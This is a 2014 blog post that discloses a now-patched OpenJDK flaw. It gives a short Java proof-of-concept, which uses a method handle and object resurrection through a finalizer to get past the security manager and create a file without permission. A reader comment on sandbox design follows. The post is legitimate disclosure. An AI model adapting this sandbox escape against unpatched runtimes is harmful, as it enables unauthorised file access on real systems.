# Thursday, January 16, 2014
« Java Method Overriding Is FUBAR Part 8 o... | Main | New Development Snapshot »
Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  static test t;

  test() throws Exception {
    super("");
  }

  protected void finalize() {
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try { new test(); } catch (Exception _) { }
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, "oops.txt", false);
  }
}

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.

Thursday, January 16, 2014 8:50:59 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [1]
Thursday, January 16, 2014 8:11:55 PM (W. Europe Standard Time, UTC+01:00)
Given the many different types of vulnerabilities I have seen on the JVM and the CLR I doubt that any in-process security boundary can be made to work. There's just too much surface area.

The BCL designers mistakenly tried to make many classes inheritable that just shouldn't be inherited from. Why should I ever inherit from FileStream? I can just inherit from Stream and wrap. Why inherit from Regex? Why inherit List<T>? Always a wrong design. Seal everything by default. Not just for security.
tobi
Comments are closed.